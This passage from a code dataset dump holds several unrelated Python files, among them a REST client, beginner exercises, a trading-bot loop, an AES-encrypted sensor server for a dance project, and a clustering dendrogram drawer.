HTTPError,\n)\n\nfrom argux_net_monitor.models.Host import Host\n\n\nclass RESTClient:\n\n \"\"\"RESTClient.\n\n Class used to interact with ArguxServer\n \"\"\"\n\n def __init__(self, base_url, username, secret):\n \"\"\"Initialise RESTClient.\n\n Arguments:\n base_url: base-url of argux-server, eg:\n https://argux-server:port/\n \"\"\"\n self.base_url = base_url\n self.username = username\n self.secret = secret\n self.cookies = {}\n self.headers = {\n 'Content-Type': 'application/json',\n 'Accept': 'application/json'\n }\n\n def __login(self):\n payload = {\n 'username': self.username,\n 'password': self.secret\n }\n try:\n response = requests.post(\n self.base_url+'/rest/1.0/login',\n headers=self.headers,\n data=json.dumps(payload))\n\n self.cookies['argux_server'] = response.cookies['argux_server']\n self.headers['X-Csrf-token'] = response.headers['X-Csrf-token']\n except ConnectionError as e:\n print(e)\n\n\n def get_hosts(self):\n\n self.__login()\n\n try:\n response = requests.get(\n self.base_url+'/rest/1.0/host',\n cookies = self.cookies,\n headers = self.headers)\n except ConnectionError as e:\n raise e\n except HTTPError as e:\n raise e\n\n json_response = response.json()\n if json_response is None:\n raise ValueError('Invalid Response, could not decode JSON')\n if not 'hosts' in json_response:\n raise ValueError('Invalid Response, missing \\'hosts\\' attribute')\n\n hosts = []\n\n for json_host in json_response['hosts']:\n if 'name' in json_host:\n hosts.append(Host(name=json_host['name']))\n\n return hosts\n","sub_path":"argux_net_monitor/rest/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"254734541","text":"# 使用 while 循环打印 1 3 5 7 9\n\n# 答案如下:\n\ndef print_odd(num): # 传递形参代表打印奇数的个数\n\tn = 1 # 设置开始数字\n\ts = 1 # 设置一个计数的变量\n\twhile True:\n\t\tif s > num: # 当打印次数达到五次就退出循环停止输出\n\t\t\tbreak\n\t\tprint(n) # 打印\n\t\tn += 2 # 数字每次加2\n\t\ts += 1 # 计数每次加1\n\nprint_odd(5) # 打印五个数\n\n\n\n\n\n# 编写一个函数,查找数字 6 是否在列表 l 里,如果在,输出“found”,如果不在,输出“not found”\n\nl = [1,5,7,8,9]\n\n# 答案如下:\n\nl = [1,5,7,8,9]\n\ndef find_num(num): # 定义一个函数,有一个形参num\n\tif num in l: #判断num是否在l中\n\t\tprint('found')\n\telse:\n\t\tprint('not found')\n\nfind_num(6) # 传递实参 6\n\n\n\n\n\n# 将字符串 s 拆分成两个字符串 s1、s2,其中 s1 只包含字母,转换为小写,以 [a-z] 排序,s2 只包含数值,升序排序\n\ns = \"aAsnr3id2d4b6gs7DZsf9e1AF\"\n\n# 答案如下\n\ns = \"aAsnr3id2d4b6gs7DZsf9e1AF\"\n\nl1 = []\nl2 = []\n\n# 得到两个列表,一个全为小写字母,一个全为数字\ndef get_list():\n\tfor i in s.lower(): # 将字符串中大写全部转为小写后遍历 \n\t\ttry:\t\t\t# 使用异常判断,如果可以转为数字则为数字,如果不能转为数字则为字母\n\t\t\tnum = int(i)\n\t\t\tl2.append(num) # 将数字放入l2\n\t\texcept ValueError as e:\n\t\t\tl1.append(i) # 将字母放入l1\n\n# 获取排序后的两个字符串s1,s2\ndef get_result():\n\ts1 = ''.join(sorted(l1)) # 将字母列表按照ascii码值升序排序后合并成字符串s1\n\ts2 = ''.join(map(lambda n:str(n),sorted(l2))) # 将数字列表中的元素升序排序后转换为字符串,再合并为s2\n\treturn (s1,s2) # 返回一个元组\n\ndef main():\n\tget_list()\n\tresult = get_result() # 获取get_result()返回值(s1,s2)\n\ts1 = result[0]\n\ts2 = result[1]\n\tprint(\"s1:\",s1)\n\tprint(\"s2:\",s2)\n\nmain()\n","sub_path":"func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"33366017","text":"# Definition for a binary tree node.\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n def insert(self, x):\n if self.val:\n if x < self.val:\n if self.left is None:\n self.left = TreeNode(x)\n else: \n self.left.insert(x)\n elif x > self.val:\n if self.right is None:\n self.right = TreeNode(x)\n else: \n self.right.insert(x)\n\n def printTree(self):\n if self.left:\n self.left.printTree()\n print(self.val),\n if self.right:\n self.right.printTree()\n \nroot = TreeNode(12)\nroot.insert(6)\nroot.insert(14)\nroot.insert(3)\n\nroot.printTree()\n\n\n \n","sub_path":"leetCode/100sameTree.py","file_name":"100sameTree.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"424095171","text":"import importlib\nimport os\n\nfrom ..utils.formatting import exception_to_str\n\n\ndef resolve_instance(arg, instance_type, default_path=\"\"):\n if not (isinstance(arg, str) and arg.startswith(\"@\")):\n return None\n\n if arg.startswith(\"@/\"):\n module_name = arg.replace(\"@/\", \"\")\n else:\n # if relative path @example insert default path\n module_name = arg.replace(\"@\", os.path.join(default_path, \"\"), 1)\n\n module_name = module_name.replace(\"/\", \".\")\n module_name = module_name.rstrip(\".\")\n\n try:\n instance_type.set_latest(None)\n module = importlib.import_module(module_name)\n importlib.reload(module)\n\n instance = instance_type.latest()\n if isinstance(instance, instance_type):\n instance._resolved_by_expression = arg\n instance._resolved_module_name = module_name\n return instance\n\n raise ValueError(\n f\"Could not find any {instance_type.__name__} in module {module_name}\"\n )\n except ImportError as e:\n raise ImportError(\n f\"Could not import module @{module_name} \"\n f\"The following exception occurred: {exception_to_str(e)}. \"\n )\n\n\ndef resolve_instance_from_code(code, instance_type):\n try:\n instance_type.set_latest(None)\n exec(code)\n\n instance = instance_type.latest()\n if isinstance(instance, instance_type):\n instance._resolved_by_code = code\n return instance\n\n raise ValueError(f\"Could not find any {instance_type.__name__} in code\")\n except Exception as e:\n raise ImportError(\n f\"Could not evaluate code. The following exception occurred: {exception_to_str(e)}. \"\n )\n","sub_path":"src/machinable/utils/importing.py","file_name":"importing.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"515637043","text":"import datetime as datetime\nimport time\nimport urllib2\n\nfrom botchart import BotChart\nfrom botstrategy import BotStrategy\nfrom botlog import BotLog\nfrom botcandlestick import BotCandlestick\n\n# Script for live trading\n\npair = \"BTC_XMR\"\nstartTime = time.time()\n\n\n# Calculate time difference and get preload data for EMA\npriceSetupDelta = datetime.timedelta(minutes=13*5) \npriceSetupTime = datetime.datetime.fromtimestamp(startTime) - priceSetupDelta\npriceSetupTime = time.mktime(priceSetupTime.timetuple())\n\npriceSetupChart = BotChart(pair, 300, priceSetupTime, startTime)\npriceSetupPrices = [point.close for point in priceSetupChart.getPoints()]\n\n# Same for trend data\ntrendSetupDelta = datetime.timedelta(minutes=13*30) \ntrendSetupTime = datetime.datetime.fromtimestamp(startTime) - trendSetupDelta\ntrendSetupTime = time.mktime(trendSetupTime.timetuple())\n\ntrendSetupChart = BotChart(pair, 1800, trendSetupTime, startTime)\ntrendSetupPrices = [point.close for point in trendSetupChart.getPoints()]\n\n\n# Load strategy with past prices for EMA\nstrategy = BotStrategy(priceSetupPrices, trendSetupPrices)\n\n\n# Load charts\nchart = BotChart(pair, 300)\ntrendChart = BotChart(pair, 1800)\n\n\ncandlesticks = []\ndevelopingCandlestick = BotCandlestick()\n\n\n# Trade loop\nwhile True:\n # Build candle\n try:\n developingCandlestick.tick(chart.getCurrentPrice())\n except urllib2.URLError:\n time.sleep(int(30))\n developingCandlestick.tick(chart.getCurrentPrice())\n\n # Look at strategy when candle is closed\n if (developingCandlestick.isClosed()):\n candlesticks.append(developingCandlestick)\n trendPrice = trendChart.getCurrentPrice()\n strategy.tick(developingCandlestick, trendPrice)\n developingCandlestick = BotCandlestick()\n\n time.sleep(int(30))\n","sub_path":"live.py","file_name":"live.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"488399455","text":"import socket\nimport threading\nimport time\nimport base64\nfrom Cryptodome.Cipher import AES\nimport sys\nfrom Cryptodome import Random\nimport time as time2\nfrom statistics import mean\nimport os\nimport traceback\n\nCURRENT_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.dirname(CURRENT_DIR))\n# from Test.runLivePrediction_ultra96 import classificationEngine\nfrom Test.relayMain import classificationEngine\n\n# Class to handle the connection to the laptop (acts as the server and opens the socket)\nclass Server(threading.Thread):\n def __init__(self, ip_addr, secret_key, ultra96, sync_threshold, buff_size, dancers_count):\n super(Server, self).__init__()\n\n self.ip_addr = ip_addr\n self.buff_size = buff_size\n self.dancers_count = dancers_count\n self.secret_key = secret_key\n self.ultra96 = ultra96\n self.logout = ultra96.logout\n self.dancers_ready = ultra96.dancers_ready\n self.sync_threshold = sync_threshold\n self.first_x_timestamp = {}\n self.dancer_data = {}\n self.classifier = classificationEngine(self.sendClassificationToDashboard)\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.socket_connection = []\n\n def sendClassificationToDashboard(self, position, predictedResult, syncDelay, formattedEVALSyncDelay):\n dashboard_msg = \"!M|{pos}|{prediction}|{syncdelay}\".format(pos = position, prediction=predictedResult, syncdelay = syncDelay)\n print(dashboard_msg)\n self.ultra96.dashboard_server.send_message(dashboard_msg)\n eval_msg = \"{pos}|{prediction}|{syncdelay}\".format(pos = position, prediction = predictedResult, syncdelay=formattedEVALSyncDelay)\n print(eval_msg)\n self.ultra96.eval_client.send_message(eval_msg)\n \n def stop(self):\n for conn in self.socket_connection:\n conn.close()\n self.socket.close()\n print(\"Ultra96 Server Has Closed\")\n\n def recvall(self, conn):\n # Buffer to ensure that only reading the full 256 bytes\n received_chunks = []\n remaining = self.buff_size\n while remaining > 0:\n received = conn.recv(remaining)\n if not received:\n return None\n received_chunks.append(received)\n remaining -= len(received)\n return b''.join(received_chunks)\n\n # Function to handle the messages from each socket, runs on a separate thread\n def handle_client(self, conn, addr):\n self.dancers_count -= 1\n dancer_id = -1\n dancer_name = \"\"\n network_delay = 0\n time = time2\n while True:\n data = self.recvall(conn)\n recv_time = time.time()\n # recv_time = 0\n if data:\n try:\n msg = self.decrypt_message(data)\n msg = msg.strip()\n # Calculate clock offset (Week 7 Evaluation)\n if \"!T\" in msg:\n self.clock_sync(conn, msg, dancer_id, recv_time)\n \n elif \"!S\" in msg:\n # Start message\n split_message = msg.split(\"|\")\n dancer_id = int(split_message[1])\n dancer_name = str(split_message[2])\n time.sleep(0.02 * int(dancer_id))\n self.ultra96.dashboard_server.send_message(msg)\n self.create_dancer(dancer_id, dancer_name)\n print(\n # f\"Dancer {dancer_id} {dancer_name} connected.\")\n f\"Server received start packet from dancer {dancer_id}.\") \n \n # Dancers sensor data\n elif \"!D\" in msg:\n # Data message\n dashboard_message = msg + f\"{dancer_name}|\"\n self.ultra96.dashboard_server.send_message(\n dashboard_message)\n tokens = msg.split(\"|\")\n [dev, ax, ay, az, gx, gy, gz, ts] = list(map(float, tokens[1:9]))\n self.classifier.add_data(\"DATA\", [dev, ax, ay, az, gx, gy, gz])\n \n # Calculate network delay (Week 7 Evaluation)\n elif \"O\" in msg:\n network_delay = float(msg.split(\"|\")[1])\n print(network_delay)\n \n # EMG Data\n elif \"!E\" in msg:\n dashboard_message = msg\n self.ultra96.dashboard_server.send_message(\n dashboard_message)\n tokens = msg.split(\"|\")\n [dev, gx, gy, gz, ts] = list(map(float, tokens[1:6]))\n self.classifier.add_data(\"EMG\", [ gx, gy, gz])\n \n except Exception as e:\n traceback.print_exc()\n print(e)\n else:\n # print(f\"Calculated sync delay is: {self.sync_delay}\")\n print(f\"No more data received from {dancer_id}\")\n break\n print(\n f\"Dancer {dancer_id} has disconnected\")\n\n def start_clock_sync_all(self):\n for conn in self.socket_connection:\n self.send_message(conn, \"!T|\")\n\n # Replies the clock synchronisation protocol\n def clock_sync(self, conn, msg, dancer_id, recv_time):\n msg += f\"{recv_time}|\"\n send_time = time.time()\n msg += f\"{send_time}|\"\n self.send_message(conn, msg, dancer_id=dancer_id)\n\n def create_dancer(self, dancer_id, dancer_name):\n self.dancer_data[dancer_id - 1] = []\n # self.dancer_names[dancer_id - 1] = dancer_name\n self.first_x_timestamp[dancer_id - 1] = []\n\n def add_data(self, dancer_id, data):\n if len(self.first_x_timestamp[dancer_id - 1]) < 7:\n data[8] = float(data[8])\n self.first_x_timestamp[dancer_id - 1].append(data[8])\n print(f\"{len(self.first_x_timestamp[dancer_id - 1])} timestamp(s) of dancer \" \n + f\"{dancer_id}\" + \" collected.\")\n \n if (len(self.first_x_timestamp[0]) == 7) and (len(self.first_x_timestamp[1]) == 7) and (len(self.first_x_timestamp[2]) == 7):\n self.get_sync_delay()\n self.first_x_timestamp[dancer_id - 1] = []\n \n # else:\n # self.first_x_timestamp[dancer_id - 1] = []\n \n # Calculate Sync Delay (for Week 7 evaluation)\n def get_sync_delay(self):\n start_of_each_dancer = [mean(timestamps)\n for timestamps in self.first_x_timestamp.values()]\n earliest_dancer = min(start_of_each_dancer)\n latest_dancer = max(start_of_each_dancer)\n self.sync_delay = int((latest_dancer - earliest_dancer) * 1000)\n print(f\"Calculated sync delay is: {self.sync_delay}\")\n\n def run(self):\n self.socket.bind(self.ip_addr)\n self.socket.listen()\n self.socket.settimeout(5)\n print(\n f\"Waiting for {self.dancers_count} connection(s)\")\n while self.dancers_count > 0:\n try:\n conn, addr = self.socket.accept()\n thread = threading.Thread(\n target=self.handle_client, args=(conn, addr))\n self.socket_connection.append(conn)\n thread.start()\n except socket.timeout:\n pass\n except OSError:\n pass\n print(f\"{len(self.socket_connection)} dancers connected.\")\n self.dancers_ready.set()\n\n # Sends a start message to all dancers\n def start_evaluation(self):\n # Start command\n for idx, conn in enumerate(self.socket_connection):\n self.send_message(conn, \"!S\")\n conn_idx = idx + 1\n print(f\"Server sends start packet to connection {conn_idx}\")\n for dancer in self.first_x_timestamp.keys():\n self.first_x_timestamp[dancer] = []\n\n def send_message(self, conn, msg, dancer_id=\"ALL\"):\n encrypted_message = self.encrypt_message(msg)\n try:\n conn.sendall(encrypted_message)\n except:\n pass\n\n def decrypt_message(self, cipher_text):\n decoded_message = base64.b64decode(cipher_text)\n iv = decoded_message[:16]\n secret_key = bytes(str(self.secret_key), encoding=\"utf8\")\n cipher = AES.new(secret_key, AES.MODE_CBC, iv)\n decrypted_message = cipher.decrypt(decoded_message[16:]).strip()\n return decrypted_message.decode('utf8')\n\n def encrypt_message(self, plain_text):\n plain_text = plain_text.ljust((int(len(plain_text)/AES.block_size) + 1) * AES.block_size,\" \")\n secret_key = bytes(str(self.secret_key), encoding=\"utf8\")\n iv = Random.new().read(AES.block_size)\n cipher = AES.new(secret_key, AES.MODE_CBC, iv)\n msg = plain_text.encode(\"utf8\")\n encoded = base64.b64encode(iv + cipher.encrypt(msg))\n # pad to buffer size\n encrypted_msg = encoded.ljust(self.buff_size, b' ')\n return encrypted_msg\n\nclass Logout():\n def __init__(self):\n self.logout = \"test\"\n\ndef main():\n ULTRA_SERVER_ADDR = ('localhost', 8081)\n NUM_OF_DANCERS = 1\n SYNC_THRESHOLD = 0.2\n # NO_OF_TIMESTAMP = 5\n BUFF_SIZE = 256\n SECRET_KEY = 9999999999999999\n logout = Logout()\n\n server = Server(ULTRA_SERVER_ADDR, SECRET_KEY, logout, SYNC_THRESHOLD, BUFF_SIZE, NUM_OF_DANCERS)\n server.run()\n server.start_evaluation()\n\nif __name__ == '__main__':\n main()","sub_path":"external_comms/ultra96_server.py","file_name":"ultra96_server.py","file_ext":"py","file_size_in_byte":9815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"134057161","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# 规范化函数,规范化随机生成的矩阵\n\n\ndef normalize(vec):\n\n s = sum(vec)\n assert(abs(s) != 0.0) # 和不能为0\n\n for i, item in enumerate(vec):\n assert(item >= 0) # 所有概率不能为负\n vec[i] = item * 1.0 / s\n","sub_path":"Algorithm/pLSA/my_util.py","file_name":"my_util.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"653944253","text":"def DigitHangman():\n question = input(\"Enter the question : \")\n puzzle = question.split()\n answer_list = []\n guess_time = 0\n WrongGuess = ''\n if len(puzzle) != 12:\n print('Question must has 12 numbers')\n return False\n for i in puzzle:\n if int(i) > 9 or int(i) < 0:\n print('Number must be 0-9')\n break\n for i in range(len(puzzle)):\n answer_list.append(\"-\")\n while guess_time < 5:\n answer = ''\n for i in answer_list:\n answer = answer + i + ' '\n print(answer,WrongGuess)\n guess = input(\"Guess : \")\n for i in range(len(puzzle)):\n if puzzle[i] == guess:\n answer_list[i] = guess\n elif guess not in puzzle:\n WrongGuess += (guess+' ')\n break\n guess_time += 1\n print(answer,WrongGuess)\n print(12-answer_list.count('-'))\nDigitHangman()\n","sub_path":"TheInternship2020/DigitHangman.py","file_name":"DigitHangman.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"377293619","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 1 15:54:53 2019\n\n@author: UO250708\n\"\"\"\n\nfrom PIL import Image # funciones para cargar y manipular imágenes\nimport numpy as np \nimport matplotlib.pyplot as plt \n\nwhite = np.ones(shape = (250,250))\nblack = np.zeros(shape = (250,250))\n\ntile1 = np.tile(np.concatenate((white, black), axis=1),4)\ntile2 = np.tile(np.concatenate((black, white), axis=1),4)\n\ntile = np.concatenate((tile1, tile2), axis=0)\n\nfor i in range(6):\n if(i%2==0):\n tile = np.concatenate((tile, tile1), axis=0)\n else:\n tile = np.concatenate((tile, tile2), axis=0)\n\nplt.imshow(tile, cmap=\"gray\")\nplt.show()\n\na2 = (tile-np.min(tile))/(np.max(tile)-np.min(tile))*255 \na3 = a2.astype(np.uint8)\n\nIm = Image.fromarray(a3)\nIm.save(\"resources/ajedrez.jpg\")\n\nwhite = np.zeros(shape = (500,500))\ncentro = 250\nradio = 250\nflag=True\nwhile radio>5:\n if(flag):\n for i in range(white.shape[0]):\n for j in range(white.shape[1]):\n if((i-centro)**2+(j-centro)**2 1:\n i=0\n for item in self.coordonate:\n if i==0:\n string_punct += str(item)\n i=1\n else:\n string_punct += \";\" + str(item)\n else:\n string_punct = str(self.coordonate[0])\n return string_punct\n\nclass Cluster:\n clusterX = -1\n clusterY = -1\n clusterLungime = -1\n def __init__(self, item1, item2):\n self.element1 = item1\n self.element2 = item2\n self.inaltime = calculeaza_media_distantelor(self)\n\n\ndef get_puncte_din_cluster(cluster):\n global lista_puncte_din_ultimul_cluster\n item1 = cluster.element1\n item2 = cluster.element2\n if isinstance(item1, Cluster):\n get_puncte_din_cluster(item1)\n elif isinstance(item1, Punct):\n lista_puncte_din_ultimul_cluster.append(item1)\n if isinstance(item2, Cluster):\n get_puncte_din_cluster(item2)\n elif isinstance(item2, Punct):\n lista_puncte_din_ultimul_cluster.append(item2)\n\ndef pune_puncte_in_cluster(cluster, cluster_rezultat):\n item1 = cluster.element1\n item2 = cluster.element2\n if isinstance(item1, Cluster):\n pune_puncte_in_cluster(item1, cluster_rezultat)\n elif isinstance(item1, Punct):\n cluster_rezultat.append(item1)\n if isinstance(item2, Cluster):\n pune_puncte_in_cluster(item2, cluster_rezultat)\n elif isinstance(item2, Punct):\n cluster_rezultat.append(item2)\n\ndef calculeaza_media_distantelor(cluster):\n global lista_puncte_din_ultimul_cluster\n get_puncte_din_cluster(cluster)\n contor = 0\n suma_distante = 0\n for i in range(0, len(lista_puncte_din_ultimul_cluster)):\n for j in range(0, len(lista_puncte_din_ultimul_cluster)):\n if i > j:\n distanta = calculeaza_distanta(lista_puncte_din_ultimul_cluster[i], lista_puncte_din_ultimul_cluster[j])\n suma_distante += distanta\n contor += 1\n lista_puncte_din_ultimul_cluster.clear()\n return suma_distante/contor\n\ndef bytes_to_string(bytes_content):\n string_content = bytes_content.decode(\"utf-8\")\n return string_content\n\ndef check_if_points(punct1, punct2):\n if isinstance(punct1, Punct) and isinstance(punct2, Punct):\n return True\n return False\n\ndef calculeaza_distanta(item1, item2):\n distanta_minima = float(\"inf\")\n distanta_maxima = -float(\"inf\")\n suma_distantelor = 0\n contor_distante = 0\n lista_puncte_din_ultimul_cluster_a = list()\n lista_puncte_din_ultimul_cluster_b = list()\n if isinstance(item1, Punct):\n lista_puncte_din_ultimul_cluster_a.append(item1)\n elif isinstance(item1, Cluster):\n pune_puncte_in_cluster(item1, lista_puncte_din_ultimul_cluster_a)\n\n if isinstance(item2, Punct):\n lista_puncte_din_ultimul_cluster_b.append(item2)\n elif isinstance(item2, Cluster):\n pune_puncte_in_cluster(item2, lista_puncte_din_ultimul_cluster_b)\n\n for i in range(0, len(lista_puncte_din_ultimul_cluster_a)):\n for j in range(0, len(lista_puncte_din_ultimul_cluster_b)):\n suma_distante = 0\n for k in range(0, d):\n suma_distante += math.pow((float(lista_puncte_din_ultimul_cluster_a[i].coordonate[k]) - float(lista_puncte_din_ultimul_cluster_b[j].coordonate[k])), 2)\n suma_distante = float(\"{0:.2f}\".format(suma_distante))\n distanta_curenta = math.sqrt(suma_distante)\n suma_distantelor += distanta_curenta\n contor_distante += 1\n if distanta_curenta < distanta_minima:\n distanta_minima = distanta_curenta\n if distanta_curenta > distanta_maxima:\n distanta_maxima = distanta_curenta\n\n distanta_medie = suma_distantelor / contor_distante\n if tip_similaritate == \"single-linkage\":\n return distanta_minima\n elif tip_similaritate == \"complete-linkage\":\n return distanta_maxima\n elif tip_similaritate == \"average-linkage\":\n return distanta_medie\n\ndef afiseaza_matrice_distante(matrice_distante):\n for i in range(0, len(lista_puncte)):\n for j in range(0, len(lista_puncte)):\n print(matrice_distante[i,j], end=\" ; \")\n print(\"\")\n\ndef get_pozitie_punct(punct_distanta):\n for i in range(0, len(lista_puncte)):\n if lista_puncte[i].coordonate == punct_distanta.coordonate:\n return i\n return -1000\n\ndef get_distante_minime(matrice, lista_elemente_din_matrice):\n distanta_minima = float(\"inf\")\n pozitii_distante_minime = list()\n distanta_min = float(\"inf\")\n min_litera_pozitie = float(\"inf\")\n index = 0\n for i in range(0, len(lista_elemente_din_matrice)):\n for j in range(0, len(lista_elemente_din_matrice)):\n if i > j:\n if matrice[i,j] < distanta_minima:\n pozitii_distante_minime.clear()\n distanta_minima = matrice[i,j]\n pozitii_distante_minime.append([i,j])\n elif matrice[i,j] == distanta_minima:\n pozitii_distante_minime.append([i,j])\n\n for i in range (0, len(pozitii_distante_minime)):\n distanta_minima_locala = float(\"inf\")\n lista_puncte_distanta_a = list()\n lista_puncte_distanta_b = list()\n lista_puncte_distanta_pozitii_a = list()\n lista_puncte_distanta_pozitii_b = list()\n if isinstance(lista_elemente_din_matrice[pozitii_distante_minime[i][0]], Punct):\n lista_puncte_distanta_a.append(lista_elemente_din_matrice[pozitii_distante_minime[i][0]])\n elif isinstance(lista_elemente_din_matrice[pozitii_distante_minime[i][0]], Cluster):\n pune_puncte_in_cluster(lista_elemente_din_matrice[pozitii_distante_minime[i][0]], lista_puncte_distanta_a)\n if isinstance(lista_elemente_din_matrice[pozitii_distante_minime[i][1]], Punct):\n lista_puncte_distanta_b.append(lista_elemente_din_matrice[pozitii_distante_minime[i][1]])\n elif isinstance(lista_elemente_din_matrice[pozitii_distante_minime[i][1]], Cluster):\n pune_puncte_in_cluster(lista_elemente_din_matrice[pozitii_distante_minime[i][1]], lista_puncte_distanta_b)\n\n for p in range(0, len(lista_puncte_distanta_a)):\n lista_puncte_distanta_pozitii_a.append(get_pozitie_punct(lista_puncte_distanta_a[p]))\n\n for q in range(0, len(lista_puncte_distanta_b)):\n lista_puncte_distanta_pozitii_b.append(get_pozitie_punct(lista_puncte_distanta_b[q]))\n\n for p in range(0, len(lista_puncte_distanta_pozitii_a)):\n for q in range(0, len(lista_puncte_distanta_pozitii_b)):\n if lista_puncte_distanta_pozitii_a[p] < min_litera_pozitie:\n min_litera_pozitie = lista_puncte_distanta_pozitii_a[p]\n if lista_puncte_distanta_pozitii_b[q] < min_litera_pozitie:\n min_litera_pozitie = lista_puncte_distanta_pozitii_b[q]\n if abs(lista_puncte_distanta_pozitii_a[p]-lista_puncte_distanta_pozitii_b[q]) < distanta_minima_locala:\n distanta_minima_locala = abs(lista_puncte_distanta_pozitii_a[p]-lista_puncte_distanta_pozitii_b[q])\n if distanta_minima_locala < distanta_min:\n distanta_min = distanta_minima_locala\n index = i\n elif distanta_minima_locala == distanta_min:\n for p in range(0, len(lista_puncte_distanta_pozitii_a)):\n if lista_puncte_distanta_pozitii_a[p] == min_litera_pozitie:\n index = i\n for q in range(0, len(lista_puncte_distanta_pozitii_b)):\n if lista_puncte_distanta_pozitii_b[q] == min_litera_pozitie:\n index = i\n\n return pozitii_distante_minime[index]\n\ndef genereaza_matrice_distante(lista_elemente_din_matrice):\n matrice_distante = {}\n for i in range(0, len(lista_elemente_din_matrice)):\n for j in range(0, len(lista_elemente_din_matrice)):\n distanta = calculeaza_distanta(lista_elemente_din_matrice[i], lista_elemente_din_matrice[j])\n matrice_distante[i,j] = distanta\n return matrice_distante\n\ndef getClusterPosition(lista_clustere, cluster):\n for i in range (0, len(lista_clustere)):\n if lista_clustere[i].element1 == cluster.element1 and lista_clustere[i].element2 == cluster.element2:\n return i\n return -1\n\n\ndef init():\n global lista_puncte\n global d\n input_file = open(input_file_name,\"rb\").read()\n input_file = bytes_to_string(input_file)\n instante = input_file.split(\"\\r\\n\")\n\n for instanta in instante:\n if \";\" in instanta:\n coordonate_instanta = instanta.split(\";\")\n d=len(coordonate_instanta)\n else:\n coordonate_instanta = [instanta]\n d=1\n\n punct = Punct(coordonate_instanta)\n lista_puncte.append(punct)\n\n\ndef main():\n global dendrograma\n global punctX\n global punctY\n global ratieInaltime\n global lista_clustere\n\n init()\n\n for punct in lista_puncte:\n print(punct.coordonate)\n\n lista_elemente_din_matrice = lista_puncte[:]\n\n while len(lista_elemente_din_matrice) > 1:\n\n matrice_distante_curenta = genereaza_matrice_distante(lista_elemente_din_matrice)\n\n distanta_minima = get_distante_minime(matrice_distante_curenta, lista_elemente_din_matrice)\n\n cluster = Cluster(lista_elemente_din_matrice[distanta_minima[0]], lista_elemente_din_matrice[distanta_minima[1]])\n lista_clustere.append(cluster)\n\n lista_elemente_din_matrice.pop(distanta_minima[0])\n lista_elemente_din_matrice.pop(distanta_minima[1])\n lista_elemente_din_matrice.append(cluster)\n\n dendrograma = cluster\n\n\nmain()\n\nfor punct in lista_puncte:\n print(str(punct))\n\ndef deseneaza_arbore(cluster, pozitieX, pozitieY, latime):\n global ratieInaltime\n\n item1 = None\n item2 = None\n aux = None\n if isinstance(cluster, Cluster):\n\n item1 = cluster.element2\n item2 = cluster.element1\n\n deseneaza_nod(cluster, pozitieX, pozitieY, latime)\n\n if isinstance(item1, Punct):\n deseneaza_punct(item1, pozitieX, pozitieY+ratieInaltime*cluster.inaltime+bufferInaltime)\n\n if isinstance(item2, Punct):\n deseneaza_punct(item2, pozitieX+latime, pozitieY+ratieInaltime*cluster.inaltime+bufferInaltime)\n\n deseneaza_arbore(item1, pozitieX-latime/4, pozitieY+ratieInaltime*cluster.inaltime+bufferInaltime, latime/2)\n\n deseneaza_arbore(item2, pozitieX+(latime+latime/2)/2, pozitieY+ratieInaltime*cluster.inaltime+bufferInaltime, latime/2)\n\n\ndef deseneaza_nod(cluster, coordonataX, coordonataY, width):\n linie = Line(Point(coordonataX, coordonataY), Point(coordonataX+width, coordonataY))\n linie.setWidth(3)\n linie.draw(win)\n\n label = Text(Point(coordonataX, coordonataY-10), str(\"C\") + str(getClusterPosition(lista_clustere, cluster)+1))\n label.draw(win)\n\n label = Text(Point(coordonataX+30, coordonataY+20), str(\"h=\") + str(cluster.inaltime)[:4])\n label.draw(win)\n\n linie = Line(Point(coordonataX, coordonataY), Point(coordonataX, coordonataY+ratieInaltime*cluster.inaltime+bufferInaltime))\n linie.setWidth(3)\n linie.draw(win)\n\n linie = Line(Point(coordonataX+width, coordonataY), Point(coordonataX+width, coordonataY+ratieInaltime*cluster.inaltime+bufferInaltime))\n linie.setWidth(3)\n linie.draw(win)\n\ndef deseneaza_punct(cluster, coordonataX, coordonataY):\n punctDeDesenat = Circle(Point(coordonataX, coordonataY), 7)\n punctDeDesenat.setFill('blue')\n punctDeDesenat.draw(win)\n\n label = Text(Point(coordonataX, coordonataY+20), str(cluster))\n label.draw(win)\n\n\nmessage = Text(Point(win.getWidth()/2, 20), 'Click anywhere to quit.')\nmessage.draw(win)\n\ndeseneaza_arbore(dendrograma, punctX, punctY, latime)\n\nwin.getMouse()\nwin.close()","sub_path":"clusterizare bottom-up/dendrograma.py","file_name":"dendrograma.py","file_ext":"py","file_size_in_byte":12768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"110918184","text":"import gym\nimport time\nimport os\nimport os.path as osp\nimport dataset\nfrom dataset import Dataset\nimport logger\nimport argparse\nimport datetime\n\nimport tensorflow as tf\nimport utils.tf_util as U\nimport numpy as np\n\nfrom cg import cg\nfrom discriminator_transition import Discriminator\nfrom utils.mujoco_dset import Dset_transition\nfrom utils.misc_util import set_global_seeds, zipsame, boolean_flag\nfrom utils.math_util import explained_variance\nfrom utils.console_util import fmt_row, colorize\nfrom contextlib import contextmanager\nfrom mpi4py import 